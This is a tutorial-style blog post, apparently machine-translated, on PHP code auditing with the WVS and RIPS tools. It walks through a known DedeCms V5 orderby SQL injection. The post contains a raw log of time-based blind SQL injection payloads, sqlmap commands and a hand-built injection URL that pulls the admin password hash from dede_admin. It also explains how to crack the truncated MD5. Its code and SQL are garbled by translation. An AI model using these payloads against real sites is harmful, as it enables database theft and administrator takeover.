Thoughts on PHP code auditing and vulnerability Mining

I would like to summarize the PHP code auditing and vulnerability mining ideas here. They are both personal points of view. If there are any mistakes, please point them out.

A large part of PHP vulnerabilities are due to the lack of experience of programmers. Of course, they are related to server configurations, but they are part of the system security category and I do not know much about them, today, I want to talk about some ideas and understandings about PHP code auditing and vulnerability mining.

The vulnerability mining in PHP is actually web penetration testing. Like the fuzzing test on the client, web penetration testing can also use similar technologies, web fuzzing, that is, web-based dynamic scanning.

There are many such software at home and abroad, such as WVS, Lan Guard, and SSS. The common characteristics of these scanners are that they search for URL addresses based on the spider engine and record the obtained URLs and parameters, then, use the script attack Statement on the local or web side to test the attack.

For example:

Http://www.foo.com/index.php? Parm1 = 1 & parm2 = 2 & parm3 = 3... & parmn = n

....

WVS uses a local script to attack the database to replace and fill these parameters, construct a new URL, and then send a request to the server through GET or POST, and perform regular identification on the returned results.

For example, "ou have an error in your SQL syntax. If it appears, record it, indicating that the script page may have a "Vulnerability.

WVS divides attacks into many modules:

1. Blind_ SQL _Injection

2. AcuSensor

3. CSRF

4. Directory_And_File_Check

5. File_Upload

6. GHDB (Google hacker database)

7. SQL _Injection

8. Weak_Password

9. XSS

Each attack test method corresponds to a class of scripts, which contains attack statements.

 

After WVS is used, if you can find some prompts about SQL injection points, you can first use sqlmap for injection attempts to further judge the injection points.

Http://www.bkjia.com/Article/201309/240553.html

At this time, we should find a way to conduct static code audits, analyze and mine the causes and utilization of vulnerabilities from the perspective of source code. This software such as RIPS can be used. RIPS is a tool dedicated for static PHP code auditing. It can help us locate the code areas where vulnerabilities may exist.

 

There are two basic ideas for RIPS to scan code for static vulnerabilities:

1. Track functions that are prone to vulnerabilities (for example, mysql_query ())

RIPS believes that all injection vulnerabilities will eventually go through some specific database operation functions, such as mysql_query () or program-defined class functions, you only need to perform a retrospective scan of the control flow and parameter stream of these functions to find most of the code vulnerabilities.

1. Track the source of the injection vulnerability, that is, the data stream transmitted by the user ($ _ GET, $ _ POST, $ _ COOKIE)

"All data input by users is harmful." Most injection vulnerabilities, including secondary injection, are caused by the fact that user input data is not properly filtered, RIPS tracks sensitive data and determines whether the data stream has a vulnerability before it enters the sensitive function (mysql_query.

 

Dynamic scanning and static positioning make it easier for us to discover and fix vulnerabilities in a timely manner.

Next, we will analyze a known vulnerability.

 

DedeCms V5 orderby parameter Injection Vulnerability

SSV-ID: 3824

SSV-AppDir: zhimeng

URL: http://sebug.net/vuldb/ssvid-3824

 

1. Dynamic scanning

After setting up the server and website, we use WVS to scan the root directory of the website. Because we are testing the black box, we can scan the root directory of the website directly.

After waiting for a while, the scan result is displayed, and some URLs suspected of being SQL injection are obtained. Here we will study the principle of WVS injection testing, and view apache access. log. We found the request (the irrelevant part has been deleted ).

 

id=-1&page=1id=-1 or 1*71=71&page=1id=-1 or 71=0&page=1id=-1' or 5=5 or '39'='39&page=1id=-1' or '39'='0&page=1id=IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/&page=1id=com_virtuemart' and sleep(2.09)='&page=1id=com_virtuemart' and (sleep(2.09)+1) limit 1 -- &page=1id=com_virtuemart'=sleep(2.09)='&page=1id=com_virtuemart"=sleep(2.09)="&page=1id=com_virtuemart'+(select 1 from (select sleep(2.09))A)+'&page=1id=com_virtuemart and sleep(2.09) &page=1id=com_virtuemart or (sleep(2.09)+1) limit 1 -- &page=1id=com_virtuemart';select pg_sleep(2.09); -- &page=1id=com_virtuemart'; waitfor delay '0:0:2.09' -- &page=1id=com_virtuemart"; waitfor delay '0:0:2.09' -- &page=1id=com_virtuemart&page=-1 or 1*22=22id=com_virtuemart&page=-1 or 22=0id=com_virtuemart&page=-1' or 5=5 or '56'='56id=com_virtuemart&page=-1' or '56'='0id=com_virtuemart&page=-1" or 5=5 or "39"="39id=com_virtuemart&page=-1" or "39"="0id=com_virtuemart&page=IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/id=com_virtuemart&page=1 and sleep(2) id=com_virtuemart&page=1 or (sleep(2)+1) limit 1 -- id=com_virtuemart&page=1' and sleep(2)='id=com_virtuemart&page=1' and sleep(0)='id=com_virtuemart&page=1' and (sleep(2)+1) limit 1 -- id=com_virtuemart&page=1' or (sleep(2)+1) limit 1 -- id=com_virtuemart&page=1" or (sleep(2)+1) limit 1 -- id=com_virtuemart&page=1" or (sleep(0)+1) limit 1 -- id=com_virtuemart&page=1'=sleep(2)='id=com_virtuemart&page=1"=sleep(2)="id=com_virtuemart&page=1'+(select 1 from (select sleep(2))A)+'id=com_virtuemart&page=1;select pg_sleep(2); -- id=com_virtuemart&page=1';select pg_sleep(2); -- id=com_virtuemart&page=1; waitfor delay '0:0:2' -- id=com_virtuemart&page=1'; waitfor delay '0:0:2' -- id=com_virtuemart&page=1"; waitfor delay '0:0:2' -- 

We can see that WVS uses a time delay-based blind injection testing technology.

Http://www.bkjia.com/Article/200501/3628.html

 

The key to blind injection exploitation is to find a binary logic judgment, that is, we need to have different return results for different inputs before we can get some information through reasoning, but sometimes, the blind injection results will not be displayed on the UI, which will lead to injection failure. However, the idea of time delay can effectively avoid this problem, so as to be able to adapt to different programs.

 

1. Injection Point Detection

After obtaining the WVS scan result, we need to check the URLs that may be injected to determine whether the injection vulnerability exists.

We select:

Http: // 192.168.174.131/index. php? Option = com_receivemart & page = 1

 

This is the script page of a message board of dedecms:


 

Use sqlmap to detect suspected injection points:

Python sqlmap. py-u "http: // 192.168.174.131/member/guestbook_admin.php? Dopost = getlist & pageno = 1 & orderby = 1 "-- current-db

The scan results failed, and manually tried the union selct and order by1, 2, 3... injection methods. It seems that the blind injection effect cannot be obtained.

There are many reasons for the failure. I have summarized the following points based on my experience:

 

Before triggering the actual SQL injection vulnerability

1. Obtain the cookie value first (if there is no cookie value, it will pop up directly on the homepage, and cannot enter some in-depth code logic)

2. Get formhash (preventing CSRF)

3. encode a field in POST or GET or cookie (base64, etc)

4. Special characters (% cf width) injection, etc.

5. SQL injection that is covered with POST or COOKIE variables

6. particularity of blind injection SQL statement Construction

 

These prior conditions are sometimes referred to as the key to vulnerability triggering and exploitation.

At this time, we have basically finished testing with automated tools. Next we will use RIPS to perform white box analysis on the source code, because the target system is an open-source cms system, we can easily download all source code from the Internet.

 

Use RIPS to scan the entire site source code of cms

RIPS has scanned many files, some of which are due to cross-reference and some are actually vulnerable code.

 

We are here:/member/guestbook_admin.php

To analyze the following code vulnerabilities

 

// Reload the list if ($ dopost = 'getlist') {PrintAjaxHead (); getlist ($ dsql, $ pageno, $ pagesize, $ orderby ); $ dsql-> Close (); exit ();......... // obtain the specific keyword list // --------------------------------- function GetList ($ dsql, $ pageno, $ pagesize, $ orderby = 'pubdate') {global $ pai_phpurl, $ pai_ml; $ jobs = array (); $ start = ($ pageno-1) * $ pagesize; $ dsql-> SetQuery ("Select * From dede_jobs where memberID = '". $ 1__ml-> M_ID. "'order by $ orderby desc limit $ start, $ pagesize"); $ dsql-> Execute (); while ($ row = $ dsql-> GetArray ()) {$ row ['endtime'] = @ ceil ($ row ['endtime']-$ row ['pubdate'])/86400 ); if ($ row ['salaries'] = 0) {$ row ['salaries'] = 'salary negotiable ';} $ jobs [] = $ row ;} foreach ($ jobs as $ job) {// Template FILE include (dirname (_ FILE __). "/templets/job.htm ");}

As you can see, the orderby parameter is not filtered during code writing. An error is reported for injection and malformed data. Next, we want to use this vulnerability to effectively inject and obtain data.

 

We manually construct an injection:

We manually construct an SQL Injection

Http: // 192.168.174.130/dedecms5.1/member/guestbook_admin.php? Dopost = getlist & pageno = 1 & orderby = mid + and + if (ASCII (SUBSTRING (SELECT + pwd + FROM + dede_admin + where + id = 1), 0, 1 )) = 63,1, (SELECT + pwd + FROM + dede_member ))

Corresponding SQL statement:

Select * From dede_member_guestbook where mid = '1' order by mid and if (ASCII (SUBSTRING (select pwd from dede_admin where id = 1),) =, (select pwd from dede_member ));

The SQL statement syntax is as follows;

SELECT select_list

[INTO new_table]

FROM table_source

[WHERE search_condition]

[Group by group_by_expression]

[HAVING search_condition]

[Order by order_expression [ASC | DESC]

The controllable parameter is the order by parameter. After the where parameter, I found that no matter whether the true or false logic of and does not affect the SQL query results.

 

Here's how to change:

Http: // 192.168.174.130/dedecms5.1/member/guestbook_admin.php? Dopost = getlist & pageno = 1 & orderby = mid, if (ASCII (SUBSTRING (select + pwd + from + dede_admin + where + id = 1), 1, 1) = 54,1, (select + pwd + from + dede_member) + asc --

 

Corresponding SQL statement:

Select * From dede_member_guestbook where mid = '1' order by mid, if (ASCII (SUBSTRING (select pwd from dede_admin where id = 1),) =, (select pwd from dede_member) asc;

This statement seems to be usable because it is in the standard SQL syntax. Adding and after order by is useless. However, this is a joke, that is, the statement after if is also part of order. Then add asc at the end, and the blind injection will be successful.

Add the -- comment after + asc to block the following desc limit.

The entire statement can be run.

 

Based on the inconsistency of the returned results, you can use the regular expression to determine and use blind injection to guess the account and password. To obtain the background permissions.

 

Then, dede's password storage mechanism is to generate a 32-bit MD5 code and truncate the first 24 bits. Therefore, the obtained hash is only 24 bits and cannot be directly cracked using mongo5.com.

Http://www.bkjia.com/Article/201203/123709.html

698d51a19d8a121ce581499d, remove the first 8 digits

9d8a121ce581499d

Convert to 15-bit MD5, And Then decrypt it with unzip 5.com.
 

The first step of penetration and code auditing is to test the website's fuzz, which can scan the website's vulnerabilities to narrow down the scope.

For specific vulnerability mining and utilization, you still need to use white box analysis, that is, source code analysis, so that you can more effectively specify the vulnerability exploitation scheme for different code situations.

 

 

This section describes some web fuzzing tools.

Browser Fuzzer 3 (bf3)-Comprehensive Web Browser Fuzzing Tool

MantraPortable --- a penetration test suite of OWASP

Webshag v1.00-Web Server Auditing Tool (plugin and File Fuzzer)

Wfuzz-A Tool for Bruteforcing/Fuzzing Web Applications

WVS

LAN Guard

SQLmap

 

 

When I first started to get started with code auditing, I did not know much about it. I just talked about some of my understandings and opinions during the normal process. I hope the great gods can provide more guidance when they pass, I will continue to learn this knowledge.